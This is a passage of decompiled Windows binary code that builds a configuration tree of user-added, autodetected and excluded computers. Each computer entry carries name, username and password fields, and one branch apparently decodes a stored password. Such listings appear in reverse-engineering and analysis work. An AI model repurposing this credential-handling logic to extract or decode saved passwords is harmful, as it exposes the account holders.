				signed int _t708;
				long _t725;
				signed int _t726;
				signed int _t727;
				void* _t746;
				signed int _t748;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t757;
				signed int _t759;
				void* _t760;
				long _t762;
				signed int _t763;
				signed int _t764;
				void* _t774;
				signed int _t776;
				void* _t779;
				signed int _t780;
				void* _t785;
				signed int _t786;
				signed int _t792;
				signed int _t797;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t805;
				void* _t806;
				intOrPtr _t807;
				void* _t810;
				intOrPtr _t813;
				void* _t814;
				signed int _t823;
				signed int _t827;
				intOrPtr _t836;
				signed int _t846;
				unsigned int _t852;
				signed int _t854;
				signed int _t864;
				intOrPtr _t875;
				void* _t934;
				unsigned int _t943;
				signed int _t948;
				unsigned int _t952;
				unsigned int _t955;
				unsigned int _t957;
				unsigned int _t959;
				unsigned int _t968;
				unsigned int _t970;
				unsigned int _t972;
				unsigned int _t975;
				unsigned int _t978;
				signed int _t982;
				void* _t983;
				signed int _t984;
				signed int _t985;
				signed int _t986;
				intOrPtr _t987;
				signed int _t988;
				signed int _t989;
				signed int _t990;
				signed int _t991;
				signed int _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				intOrPtr _t996;
				signed int _t997;
				signed int _t998;
				signed int _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr _t1004;
				void* _t1006;
				void* _t1009;
				signed int _t1010;
				signed int _t1011;
				void* _t1014;
				signed int _t1015;
				void* _t1016;
				intOrPtr _t1017;
				signed int _t1018;
				signed int _t1019;

				_t813 =  *((intOrPtr*)(__ecx + 0x38));
				_push(0xffffffff);
				_push(E004305C1);
				_push( *[fs:0x0]);
				_t1015 = _t1014 - 0x868;
				_t438 =  *0x43a6a8; // 0x2a5cd135
				 *(_t1015 + 0x864) = _t438 ^ _t1015;
				_push(_t803);
				_t440 =  *0x43a6a8; // 0x2a5cd135
				_push(_t440 ^ _t1015);
				 *[fs:0x0] = _t1015 + 0x87c;
				_t982 =  *(_t1015 + 0x88c);
				_t443 = _t982;
				_t1004 = _t813;
				 *(_t1015 + 0x38) = _t982;
				 *((intOrPtr*)(_t1015 + 0x74)) = 7;
				 *((intOrPtr*)(_t1015 + 0x70)) = 0;
				 *((short*)(_t1015 + 0x60)) = 0;
				_t934 = _t443 + 2;
				goto L2;
				L20:
				 *((intOrPtr*)(_t1017 + 0x2c)) = _t1017;
				E00408FB0(0x432444, _t823);
				 *((intOrPtr*)(_t1017 + 0x34)) = _t1017;
				 *((char*)(_t1017 + 0x890)) = 8;
				E00408FB0(L"useradded", _t1017);
				_push(L"//init_data");
				 *((char*)(_t1017 + 0x890)) = 9;
				_t463 = E00408FB0();
				 *((char*)(_t1017 + 0x88c)) = 0xa;
				 *((char*)(_t1017 + 0x88c)) = 0xb;
				_t827 =  *(_t1004 + 0x4c);
				_push(_t463);
				E00413190();
				_t465 =  *(_t1017 + 0x18);
				 *((char*)(_t1017 + 0x884)) = 3;
				if(_t465 != 0) {
					_t982 = _t465;
					if(InterlockedDecrement(_t465 + 8) == 0 && _t982 != 0) {
						_t792 =  *(_t982 + 4);
						_t1036 = _t792;
						if(_t792 != 0) {
							_push(_t792);
							L0041B408(_t804, _t982, _t1004, _t1036);
							_t1017 = _t1017 + 4;
						}
						_push(_t982);
						L0041A97D(_t804, _t982, _t1004, _t1036);
						_t1017 = _t1017 + 4;
					}
				}
				 *((intOrPtr*)(_t1017 + 0x2c)) = _t1017;
				E00408FB0(0x432444, _t827);
				 *((intOrPtr*)(_t1017 + 0x34)) = _t1017;
				 *((char*)(_t1017 + 0x890)) = 0xc;
				E00408FB0(L"excluded", _t1017);
				_push(L"//init_data");
				 *((char*)(_t1017 + 0x890)) = 0xd;
				_t468 = E00408FB0();
				 *((char*)(_t1017 + 0x88c)) = 0xe;
				 *((char*)(_t1017 + 0x88c)) = 0xf;
				_push(_t468);
				E00413190();
				_t470 =  *(_t1017 + 0x18);
				 *((char*)(_t1017 + 0x884)) = 3;
				if(_t470 != 0) {
					_t982 = _t470;
					if(InterlockedDecrement(_t470 + 8) == 0 && _t982 != 0) {
						_t785 =  *_t982;
						if(_t785 != 0) {
							__imp__#6(_t785);
						}
						_t786 =  *(_t982 + 4);
						_t1041 = _t786;
						if(_t786 != 0) {
							_push(_t786);
							L0041B408(_t804, _t982, _t1004, _t1041);
							_t1017 = _t1017 + 4;
						}
						_push(_t982);
						L0041A97D(_t804, _t982, _t1004, _t1041);
						_t1017 = _t1017 + 4;
					}
				}
				_t805 = 0;
				while(1) {
					_t471 =  *(_t1004 + 0x14);
					if(_t471 == 0) {
						break;
					}
					_t929 =  *((intOrPtr*)(_t1004 + 0x18)) - _t471;
					if(_t805 >= (0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t471) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t471) >> 0x20 >> 1)) {
						break;
					}
					 *((intOrPtr*)(_t1017 + 0x1c)) = _t1017;
					E00408FB0(0x432444, _t929);
					 *((intOrPtr*)(_t1017 + 0x30)) = _t1017;
					 *((char*)(_t1017 + 0x890)) = 0x10;
					E00408FB0(L"computer", _t1017);
					_push(L"//init_data//autodetected");
					 *((char*)(_t1017 + 0x890)) = 0x11;
					_t774 = E00408FB0();
					 *((char*)(_t1017 + 0x88c)) = 0x12;
					 *((char*)(_t1017 + 0x88c)) = 0x13;
					_push(_t774);
					E00413190();
					_t776 =  *(_t1017 + 0x14);
					 *((char*)(_t1017 + 0x884)) = 3;
					if(_t776 != 0) {
						_t982 = _t776;
						if(InterlockedDecrement(_t776 + 8) == 0 && _t982 != 0) {
							_t779 =  *_t982;
							if(_t779 != 0) {
								__imp__#6(_t779);
							}
							_t780 =  *(_t982 + 4);
							_t1049 = _t780;
							if(_t780 != 0) {
								_push(_t780);
								L0041B408(_t805, _t982, _t1004, _t1049);
								_t1017 = _t1017 + 4;
							}
							_push(_t982);
							L0041A97D(_t805, _t982, _t1004, _t1049);
							_t1017 = _t1017 + 4;
						}
						 *(_t1017 + 0x14) = 0;
					}
					_t805 = _t805 + 1;
				}
				_t832 = _t1004;
				_t1009 = 0;
				_t472 = E00403D00(_t1004);
				__eflags = _t472;
				if(_t472 <= 0) {
					L61:
					_t806 = 0;
					while(1) {
						_t473 =  *(_t1004 + 0x24);
						__eflags = _t473;
						if(_t473 == 0) {
							break;
						}
						_t919 =  *((intOrPtr*)(_t1004 + 0x28)) - _t473;
						_t978 = (0x92492493 * ( *((intOrPtr*)(_t1004 + 0x28)) - _t473) >> 0x20) +  *((intOrPtr*)(_t1004 + 0x28)) - _t473 >> 4;
						__eflags = _t806 - (_t978 >> 0x1f) + _t978;
						if(_t806 >= (_t978 >> 0x1f) + _t978) {
							break;
						}
						 *((intOrPtr*)(_t1017 + 0x1c)) = _t1017;
						E00408FB0(0x432444, _t919);
						 *((intOrPtr*)(_t1017 + 0x30)) = _t1017;
						 *((char*)(_t1017 + 0x890)) = 0x18;
						E00408FB0(L"computer", _t1017);
						_push(L"//init_data//excluded");
						 *((char*)(_t1017 + 0x890)) = 0x19;
						_t746 = E00408FB0();
						 *((char*)(_t1017 + 0x88c)) = 0x1a;
						 *((char*)(_t1017 + 0x88c)) = 0x1b;
						_push(_t746);
						E00413190();
						_t748 =  *(_t1017 + 0x14);
						__eflags = _t748;
						 *((char*)(_t1017 + 0x884)) = 3;
						if(_t748 != 0) {
							_t982 = _t748;
							_t750 = InterlockedDecrement(_t748 + 8);
							__eflags = _t750;
							if(_t750 == 0) {
								__eflags = _t982;
								if(_t982 != 0) {
									_t751 =  *_t982;
									__eflags = _t751;
									if(_t751 != 0) {
										__imp__#6(_t751);
									}
									_t752 =  *(_t982 + 4);
									__eflags = _t752;
									if(__eflags != 0) {
										_push(_t752);
										L0041B408(_t806, _t982, _t1004, __eflags);
										_t1017 = _t1017 + 4;
									}
									_push(_t982);
									L0041A97D(_t806, _t982, _t1004, __eflags);
									_t1017 = _t1017 + 4;
								}
							}
							 *(_t1017 + 0x14) = 0;
						}
						_t806 = _t806 + 1;
					}
					 *(_t1017 + 0x24) = 0;
					 *((intOrPtr*)(_t1017 + 0x20)) = _t1017;
					 *((char*)(_t1017 + 0x890)) = 0x1c;
					E00408FB0(L"//init_data//useradded/*", _t1017 + 0x24);
					_t475 = E00412F50( *(_t1004 + 0x4c));
					__imp__#2(0x432444, _t1017 + 0x24);
					 *((intOrPtr*)(_t1017 + 0x40)) = _t475;
					 *((char*)(_t1017 + 0x84)) = 0;
					E0041B880(_t982, _t1017 + 0x7d, 0, 0x3ff);
					_t1018 = _t1017 + 0xc;
					_t836 = _t1004;
					 *(_t1018 + 0x3c) = 0;
					_t807 = 0;
					_t477 = E00403D00(_t836);
					__eflags = _t477;
					if(_t477 <= 0) {
						L154:
						_push(_t1018 + 0x24);
						 *(_t1018 + 0x28) = _t1018;
						E00408FB0(L"//init_data//autodetected/*", _t1018 + 0x24);
						E00412F50( *(_t1004 + 0x4c));
						_t936 = _t1018 + 0x47d;
						 *((char*)(_t1018 + 0x484)) = 0;
						E0041B880(_t982, _t1018 + 0x47d, 0, 0x3ff);
						_t1019 = _t1018 + 0xc;
						_t1010 = 0;
						__eflags = 0;
						 *((intOrPtr*)(_t1019 + 0x14)) = 0;
						while(1) {
							_t481 =  *(_t1004 + 0x14);
							__eflags = _t481;
							if(_t481 == 0) {
								break;
							}
							_t864 =  *((intOrPtr*)(_t1004 + 0x18)) - _t481;
							_t936 = 0x2aaaaaab * _t864 >> 0x20 >> 1;
							__eflags = _t1010 - (_t936 >> 0x1f) + _t936;
							if(_t1010 >= (_t936 >> 0x1f) + _t936) {
								break;
							}
							_push(_t1019 + 0x1c);
							_push(_t1010);
							_push(_t864);
							 *_t1019 =  *(_t1019 + 0x30);
							_t544 =  *(_t1019 + 0x30);
							__eflags = _t544;
							 *(_t1019 + 0x2c) = _t1019;
							if(_t544 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t544 + 4))))(_t544);
							}
							E004129D0( *(_t1004 + 0x4c));
							_t546 =  *(_t1019 + 0x1c);
							_t867 =  *_t546;
							 *((intOrPtr*)( *((intOrPtr*)( *_t546 + 0xa4))))(_t546, _t1019 + 0x34);
							_t549 =  *(_t1004 + 0x14);
							__eflags = _t549;
							if(_t549 == 0) {
								L161:
								E0041AD33();
								goto L162;
							} else {
								_t867 =  *((intOrPtr*)(_t1004 + 0x18)) - _t549;
								_t959 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t549) >> 0x20 >> 1;
								__eflags = _t1010 - (_t959 >> 0x1f) + _t959;
								if(_t1010 < (_t959 >> 0x1f) + _t959) {
									L162:
									_t947 =  *((intOrPtr*)( *(_t1004 + 0x14) +  *((intOrPtr*)(_t1019 + 0x14))));
									 *(_t1019 + 0x24) = _t1019;
									E00408FB0( *((intOrPtr*)( *(_t1004 + 0x14) +  *((intOrPtr*)(_t1019 + 0x14)))), _t867);
									_push(L"name");
									 *((char*)(_t1019 + 0x88c)) = 0x29;
									_t985 =  *(E00408FB0());
									__eflags = _t985;
									 *((char*)(_t1019 + 0x888)) = 0x2a;
									if(_t985 == 0) {
										_t986 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t985 + 4);
										if( *(_t985 + 4) == 0) {
											 *(_t985 + 4) = E00419DD0( *_t985);
										}
										_t986 =  *(_t985 + 4);
									}
									_push(_t986);
									_push(_t1019 + 0x24);
									 *((char*)(_t1019 + 0x890)) = 0x2b;
									_t871 =  *(_t1004 + 0x4c);
									E00413330( *(_t1004 + 0x4c), _t947);
									_t556 =  *(_t1019 + 0x18);
									__eflags = _t556;
									 *((char*)(_t1019 + 0x884)) = 0x1c;
									if(_t556 != 0) {
										_t993 = _t556;
										_t626 = InterlockedDecrement(_t556 + 8);
										__eflags = _t626;
										if(_t626 == 0) {
											__eflags = _t993;
											if(_t993 != 0) {
												_t627 =  *_t993;
												__eflags = _t627;
												if(_t627 != 0) {
													__imp__#6(_t627);
												}
												_t628 =  *(_t993 + 4);
												__eflags = _t628;
												if(__eflags != 0) {
													_push(_t628);
													L0041B408(0, _t993, _t1004, __eflags);
													_t1019 = _t1019 + 4;
												}
												_push(_t993);
												L0041A97D(0, _t993, _t1004, __eflags);
												_t1019 = _t1019 + 4;
											}
										}
										 *(_t1019 + 0x18) = 0;
									}
									_t557 =  *(_t1004 + 0x14);
									__eflags = _t557;
									if(_t557 == 0) {
										L178:
										E0041AD33();
										goto L179;
									} else {
										_t871 =  *((intOrPtr*)(_t1004 + 0x18)) - _t557;
										_t957 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t557) >> 0x20 >> 1;
										__eflags = _t1010 - (_t957 >> 0x1f) + _t957;
										if(_t1010 < (_t957 >> 0x1f) + _t957) {
											L179:
											_t948 =  *(_t1004 + 0x14);
											_t987 =  *((intOrPtr*)(_t1019 + 0x14));
											__eflags =  *(_t948 + _t987 + 4);
											if( *(_t948 + _t987 + 4) == 0) {
												_t559 = 0x432444;
												L185:
												 *(_t1019 + 0x24) = _t1019;
												E00408FB0(_t559, _t871);
												_push(L"username");
												 *((char*)(_t1019 + 0x88c)) = 0x2c;
												_t988 =  *(E00408FB0());
												__eflags = _t988;
												 *((char*)(_t1019 + 0x888)) = 0x2d;
												if(_t988 == 0) {
													_t989 = 0;
													__eflags = 0;
												} else {
													__eflags =  *(_t988 + 4);
													if( *(_t988 + 4) == 0) {
														 *(_t988 + 4) = E00419DD0( *_t988);
													}
													_t989 =  *(_t988 + 4);
												}
												_push(_t989);
												_t936 = _t1019 + 0x24;
												 *((char*)(_t1019 + 0x88c)) = 0x2e;
												_push(_t1019 + 0x24);
												E00413330( *(_t1004 + 0x4c), _t1019 + 0x24);
												_t563 =  *(_t1019 + 0x28);
												__eflags = _t563;
												 *((char*)(_t1019 + 0x884)) = 0x1c;
												if(_t563 != 0) {
													_t992 = _t563;
													_t606 = InterlockedDecrement(_t563 + 8);
													__eflags = _t606;
													if(_t606 == 0) {
														__eflags = _t992;
														if(_t992 != 0) {
															_t607 =  *_t992;
															__eflags = _t607;
															if(_t607 != 0) {
																__imp__#6(_t607);
															}
															_t608 =  *(_t992 + 4);
															__eflags = _t608;
															if(__eflags != 0) {
																_push(_t608);
																L0041B408(0, _t992, _t1004, __eflags);
																_t1019 = _t1019 + 4;
															}
															_push(_t992);
															L0041A97D(0, _t992, _t1004, __eflags);
															_t1019 = _t1019 + 4;
														}
													}
													 *(_t1019 + 0x28) = 0;
												}
												_t564 =  *(_t1004 + 0x14);
												__eflags = _t564;
												if(_t564 == 0) {
													L201:
													E0041AD33();
													goto L202;
												} else {
													_t936 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t564) >> 0x20 >> 1;
													__eflags = _t1010 - (_t936 >> 0x1f) + _t936;
													if(_t1010 < (_t936 >> 0x1f) + _t936) {
														L202:
														_t566 =  *(_t1004 + 0x14);
														_t875 =  *((intOrPtr*)(_t1019 + 0x14));
														__eflags =  *(_t566 + _t875 + 8);
														if( *(_t566 + _t875 + 8) == 0) {
															 *(_t1019 + 0x24) = _t1019;
															E00408FB0(0x432444, _t875);
															_push(L"password");
															 *((char*)(_t1019 + 0x88c)) = 0x32;
															_t990 =  *(E00408FB0());
															__eflags = _t990;
															 *((char*)(_t1019 + 0x888)) = 0x33;
															if(_t990 == 0) {
																_t982 = 0;
																__eflags = 0;
															} else {
																__eflags =  *(_t990 + 4);
																if( *(_t990 + 4) == 0) {
																	_t936 =  *_t990;
																	 *(_t990 + 4) = E00419DD0( *_t990);
																}
																_t982 =  *(_t990 + 4);
															}
															_push(_t982);
															 *((char*)(_t1019 + 0x88c)) = 0x34;
															_push(_t1019 + 0x24);
															E00413330( *(_t1004 + 0x4c), _t936);
															_t571 =  *(_t1019 + 0x30);
															__eflags = _t571;
															 *((char*)(_t1019 + 0x884)) = 0x1c;
															if(_t571 != 0) {
																_t982 = _t571;
																_t573 = InterlockedDecrement(_t571 + 8);
																__eflags = _t573;
																if(_t573 == 0) {
																	__eflags = _t982;
																	if(_t982 != 0) {
																		_t574 =  *_t982;
																		__eflags = _t574;
																		if(_t574 != 0) {
																			__imp__#6(_t574);
																		}
																		_t575 =  *(_t982 + 4);
																		__eflags = _t575;
																		if(__eflags != 0) {
																			_push(_t575);
																			L0041B408(0, _t982, _t1004, __eflags);
																			_t1019 = _t1019 + 4;
																		}
																		_push(_t982);
																		L0041A97D(0, _t982, _t1004, __eflags);
																		_t1019 = _t1019 + 4;
																	}
																}
																 *(_t1019 + 0x30) = 0;
															}
															L234:
															_t1010 = _t1010 + 1;
															 *((intOrPtr*)(_t1019 + 0x14)) =  *((intOrPtr*)(_t1019 + 0x14)) + 0xc;
															continue;
														}
														__eflags = _t566;
														if(_t566 == 0) {
															L205:
															E0041AD33();
															L206:
															E00418B90( *((intOrPtr*)( *(_t1004 + 0x14) +  *(_t1019 + 0x18) + 8)), _t1019 + 0x480, 0x400, _t1019 + 0x3c);
															_t1019 = _t1019 + 0xc;
															_t936 = _t1019 + 0x47c;
															 *(_t1019 + 0x24) = _t1019;
															E00408F20(_t1019 + 0x47c);
															 *((char*)(_t1019 + 0x88c)) = 0x2f;
															_t991 =  *(E00408FB0(L"password", _t1019 + 0x47c));
															__eflags = _t991;
															 *((char*)(_t1019 + 0x888)) = 0x30;
															if(_t991 == 0) {
																_t982 = 0;
																__eflags = 0;
															} else {
																__eflags =  *(_t991 + 4);
																if( *(_t991 + 4) == 0) {
																	 *(_t991 + 4) = E00419DD0( *_t991);
																}
																_t982 =  *(_t991 + 4);
															}
															_push(_t982);
															_push(_t1019 + 0x24);
															 *((char*)(_t1019 + 0x890)) = 0x31;
															E00413330( *(_t1004 + 0x4c), _t936);
															_t586 =  *(_t1019 + 0x2c);
															__eflags = _t586;
															 *((char*)(_t1019 + 0x884)) = 0x1c;
															if(_t586 == 0) {
																goto L234;
															} else {
																_t982 = _t586;
																_t588 = InterlockedDecrement(_t586 + 8);
																__eflags = _t588;
																if(_t588 == 0) {
																	__eflags = _t982;
																	if(_t982 != 0) {
																		_t589 =  *_t982;
																		__eflags = _t589;
																		if(_t589 != 0) {
																			__imp__#6(_t589);
																		}
																		_t590 =  *(_t982 + 4);
																		__eflags = _t590;
																		if(__eflags != 0) {
																			_push(_t590);
																			L0041B408(0, _t982, _t1004, __eflags);
																			_t1019 = _t1019 + 4;
																		}
																		_push(_t982);
																		L0041A97D(0, _t982, _t1004, __eflags);
																		_t1019 = _t1019 + 4;
																	}
																}
																_t1010 = _t1010 + 1;
																 *((intOrPtr*)(_t1019 + 0x14)) =  *((intOrPtr*)(_t1019 + 0x14)) + 0xc;
																 *(_t1019 + 0x2c) = 0;
																continue;
															}
														}
														_t952 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t566) >> 0x20 >> 1;
														__eflags = _t1010 - (_t952 >> 0x1f) + _t952;
														if(_t1010 < (_t952 >> 0x1f) + _t952) {
															goto L206;
														}
														goto L205;
													}
													goto L201;
												}
											}
											_t612 = _t948;
											__eflags = _t612;
											if(_t612 == 0) {
												L182:
												E0041AD33();
												L183:
												_t559 =  *((intOrPtr*)(_t987 +  *(_t1004 + 0x14) + 4));
												goto L185;
											}
											_t871 =  *((intOrPtr*)(_t1004 + 0x18)) - _t612;
											_t955 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 0x18)) - _t612) >> 0x20 >> 1;
											__eflags = _t1010 - (_t955 >> 0x1f) + _t955;
											if(_t1010 < (_t955 >> 0x1f) + _t955) {
												goto L183;
											}
											goto L182;
										}
										goto L178;
									}
								}
								goto L161;
							}
						}
						_push(_t1019 + 0x24);
						 *(_t1019 + 0x28) = _t1019;
						E00408FB0(L"//init_data//excluded/*", _t1019 + 0x24);
						E00412F50( *(_t1004 + 0x4c));
						_t1011 = 0;
						__eflags = 0;
						 *((intOrPtr*)(_t1019 + 0x14)) = 0;
						while(1) {
							_t484 =  *(_t1004 + 0x24);
							__eflags = _t484;
							if(_t484 == 0) {
								break;
							}
							_t854 =  *((intOrPtr*)(_t1004 + 0x28)) - _t484;
							_t936 = (0x92492493 * _t854 >> 0x20) + _t854 >> 4;
							__eflags = _t1011 - (_t936 >> 0x1f) + _t936;
							if(_t1011 >= (_t936 >> 0x1f) + _t936) {
								break;
							}
							_push(_t1019 + 0x1c);
							_push(_t1011);
							_push(_t854);
							 *_t1019 =  *(_t1019 + 0x30);
							_t509 =  *(_t1019 + 0x30);
							__eflags = _t509;
							 *(_t1019 + 0x2c) = _t1019;
							if(_t509 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t509 + 4))))(_t509);
							}
							E004129D0( *(_t1004 + 0x4c));
							_t511 =  *(_t1019 + 0x1c);
							_t857 =  *_t511;
							 *((intOrPtr*)( *((intOrPtr*)( *_t511 + 0xa4))))(_t511, _t1019 + 0x34);
							_t514 =  *(_t1004 + 0x24);
							__eflags = _t514;
							if(_t514 == 0) {
								L242:
								E0041AD33();
								goto L243;
							} else {
								_t857 =  *((intOrPtr*)(_t1004 + 0x28)) - _t514;
								_t943 = (0x92492493 * ( *((intOrPtr*)(_t1004 + 0x28)) - _t514) >> 0x20) +  *((intOrPtr*)(_t1004 + 0x28)) - _t514 >> 4;
								__eflags = _t1011 - (_t943 >> 0x1f) + _t943;
								if(_t1011 < (_t943 >> 0x1f) + _t943) {
									L243:
									_t517 =  *(_t1004 + 0x24) +  *((intOrPtr*)(_t1019 + 0x14));
									__eflags =  *((intOrPtr*)(_t517 + 0x18)) - 8;
									if( *((intOrPtr*)(_t517 + 0x18)) < 8) {
										_t518 = _t517 + 4;
										__eflags = _t517 + 4;
									} else {
										_t518 =  *(_t517 + 4);
									}
									 *(_t1019 + 0x24) = _t1019;
									E00408FB0(_t518, _t857);
									_push(L"name");
									 *((char*)(_t1019 + 0x88c)) = 0x35;
									_t984 =  *(E00408FB0());
									__eflags = _t984;
									 *((char*)(_t1019 + 0x888)) = 0x36;
									if(_t984 == 0) {
										_t982 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t984 + 4);
										if( *(_t984 + 4) == 0) {
											 *(_t984 + 4) = E00419DD0( *_t984);
										}
										_t982 =  *(_t984 + 4);
									}
									_push(_t982);
									_t936 = _t1019 + 0x24;
									 *((char*)(_t1019 + 0x88c)) = 0x37;
									_push(_t1019 + 0x24);
									E00413330( *(_t1004 + 0x4c), _t1019 + 0x24);
									_t522 =  *(_t1019 + 0x18);
									__eflags = _t522;
									 *((char*)(_t1019 + 0x884)) = 0x1c;
									if(_t522 != 0) {
										_t982 = _t522;
										_t524 = InterlockedDecrement(_t522 + 8);
										__eflags = _t524;
										if(_t524 == 0) {
											__eflags = _t982;
											if(_t982 != 0) {
												_t525 =  *_t982;
												__eflags = _t525;
												if(_t525 != 0) {
													__imp__#6(_t525);
												}
												_t526 =  *(_t982 + 4);
												__eflags = _t526;
												if(__eflags != 0) {
													_push(_t526);
													L0041B408(0, _t982, _t1004, __eflags);
													_t1019 = _t1019 + 4;
												}
												_push(_t982);
												L0041A97D(0, _t982, _t1004, __eflags);
												_t1019 = _t1019 + 4;
											}
										}
										 *(_t1019 + 0x18) = 0;
									}
									_t1011 = _t1011 + 1;
									 *((intOrPtr*)(_t1019 + 0x14)) =  *((intOrPtr*)(_t1019 + 0x14)) + 0x1c;
									continue;
								}
								goto L242;
							}
						}
						_push( *(_t1019 + 0x38));
						_t486 = E00408FB0();
						 *((char*)(_t1019 + 0x888)) = 0x38;
						E00412880( *(_t1004 + 0x4c), _t486);
						_t488 =  *(_t1019 + 0x38);
						__eflags = _t488;
						 *((char*)(_t1019 + 0x884)) = 0x1c;
						if(_t488 != 0) {
							_t982 = _t488;
							_t498 = InterlockedDecrement(_t488 + 8);
							__eflags = _t498;
							if(_t498 == 0) {
								__eflags = _t982;
								if(_t982 != 0) {
									_t499 =  *_t982;
									__eflags = _t499;
									if(_t499 != 0) {
										__imp__#6(_t499);
									}
									_t500 =  *(_t982 + 4);
									__eflags = _t500;
									if(__eflags != 0) {
										_push(_t500);
										L0041B408(0, _t982, _t1004, __eflags);
										_t1019 = _t1019 + 4;
									}
									_push(_t982);
									L0041A97D(0, _t982, _t1004, __eflags);
									_t1019 = _t1019 + 4;
								}
							}
						}
						 *(_t1004 + 0x4c) = 0;
						__imp__#6( *((intOrPtr*)(_t1019 + 0x34)));
						_t489 =  *(_t1019 + 0x24);
						__eflags = _t489;
						if(_t489 != 0) {
							_t936 =  *_t489;
							 *((intOrPtr*)( *((intOrPtr*)( *_t489 + 8))))(_t489);
							_t489 = 0;
							__eflags = 0;
							 *(_t1019 + 0x24) = 0;
						}
						_t846 =  *(_t1019 + 0x1c);
						__eflags = _t846;
						if(_t846 != 0) {
							_t936 =  *_t846;
							 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 8))))(_t846);
							_t489 =  *(_t1019 + 0x24);
							_t846 = 0;
							__eflags = 0;
							 *(_t1019 + 0x1c) = 0;
						}
						__eflags = _t489;
						 *((char*)(_t1019 + 0x884)) = 3;
						if(_t489 != 0) {
							_t852 =  *_t489;
							_t936 =  *(_t852 + 8);
							_t489 =  *( *(_t852 + 8))(_t489);
							_t846 =  *(_t1019 + 0x1c);
						}
						__eflags = _t846;
						 *((char*)(_t1019 + 0x884)) = 1;
						if(_t846 != 0) {
							_t489 =  *((intOrPtr*)( *((intOrPtr*)( *_t846 + 8))))(_t846);
						}
						__eflags =  *((intOrPtr*)(_t1019 + 0x58)) - 8;
						if(__eflags >= 0) {
							_t936 =  *(_t1019 + 0x44);
							_push( *(_t1019 + 0x44));
							_t489 = L0041A97D(0, _t982, 8, __eflags);
							_t1019 = _t1019 + 4;
						}
						__eflags =  *((intOrPtr*)(_t1019 + 0x74)) - 8;
						 *((intOrPtr*)(_t1019 + 0x58)) = 7;
						 *((intOrPtr*)(_t1019 + 0x54)) = 0;
						 *(_t1019 + 0x44) = 0;
						if(__eflags >= 0) {
							_push( *((intOrPtr*)(_t1019 + 0x60)));
							_t489 = L0041A97D(0, _t982, 8, __eflags);
							_t1019 = _t1019 + 4;
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t1019 + 0x87c));
						_pop(_t983);
						_pop(_t1006);
						_pop(_t810);
						__eflags =  *(_t1019 + 0x864) ^ _t1019;
						return E0041B3F9(_t489, _t810,  *(_t1019 + 0x864) ^ _t1019, _t936, _t983, _t1006);
					}
					 *((intOrPtr*)(_t1018 + 0x14)) = 0;
					do {
						_push(_t1018 + 0x1c);
						_push(_t807);
						_push(_t836);
						 *_t1018 =  *(_t1018 + 0x30);
						_t642 =  *(_t1018 + 0x30);
						__eflags = _t642;
						 *(_t1018 + 0x2c) = _t1018;
						if(_t642 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))(_t642);
						}
						E004129D0( *(_t1004 + 0x4c));
						_t644 =  *(_t1018 + 0x1c);
						_t894 =  *_t644;
						 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 0xa4))))(_t644, _t1018 + 0x34);
						_t647 =  *(_t1004 + 4);
						__eflags = _t647;
						if(_t647 == 0) {
							L80:
							E0041AD33();
							goto L81;
						} else {
							_t894 =  *((intOrPtr*)(_t1004 + 8)) - _t647;
							_t975 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 8)) - _t647) >> 0x20 >> 1;
							__eflags = _t807 - (_t975 >> 0x1f) + _t975;
							if(_t807 < (_t975 >> 0x1f) + _t975) {
								L81:
								_t962 =  *( *(_t1004 + 4) +  *((intOrPtr*)(_t1018 + 0x14)));
								 *(_t1018 + 0x24) = _t1018;
								E00408FB0( *( *(_t1004 + 4) +  *((intOrPtr*)(_t1018 + 0x14))), _t894);
								_push(L"name");
								 *((char*)(_t1018 + 0x88c)) = 0x1d;
								_t994 =  *(E00408FB0());
								__eflags = _t994;
								 *((char*)(_t1018 + 0x888)) = 0x1e;
								if(_t994 == 0) {
									_t995 = 0;
									__eflags = 0;
								} else {
									__eflags =  *(_t994 + 4);
									if( *(_t994 + 4) == 0) {
										 *(_t994 + 4) = E00419DD0( *_t994);
									}
									_t995 =  *(_t994 + 4);
								}
								_push(_t995);
								_push(_t1018 + 0x24);
								 *((char*)(_t1018 + 0x890)) = 0x1f;
								_t898 =  *(_t1004 + 0x4c);
								E00413330( *(_t1004 + 0x4c), _t962);
								_t654 =  *(_t1018 + 0x30);
								__eflags = _t654;
								 *((char*)(_t1018 + 0x884)) = 0x1c;
								if(_t654 != 0) {
									_t1002 = _t654;
									_t725 = InterlockedDecrement(_t654 + 8);
									__eflags = _t725;
									if(_t725 == 0) {
										__eflags = _t1002;
										if(_t1002 != 0) {
											_t726 =  *_t1002;
											__eflags = _t726;
											if(_t726 != 0) {
												__imp__#6(_t726);
											}
											_t727 =  *(_t1002 + 4);
											__eflags = _t727;
											if(__eflags != 0) {
												_push(_t727);
												L0041B408(_t807, _t1002, _t1004, __eflags);
												_t1018 = _t1018 + 4;
											}
											_push(_t1002);
											L0041A97D(_t807, _t1002, _t1004, __eflags);
											_t1018 = _t1018 + 4;
										}
									}
									 *(_t1018 + 0x30) = 0;
								}
								_t655 =  *(_t1004 + 4);
								__eflags = _t655;
								if(_t655 == 0) {
									L97:
									E0041AD33();
									goto L98;
								} else {
									_t898 =  *((intOrPtr*)(_t1004 + 8)) - _t655;
									_t962 = 0x2aaaaaab * ( *((intOrPtr*)(_t1004 + 8)) - _t655) >> 0x20 >> 1;
									__eflags = _t807 - (_t962 >> 0x1f) + _t962;
									if(_t807 < (_t962 >> 0x1f) + _t962) {
										L98:
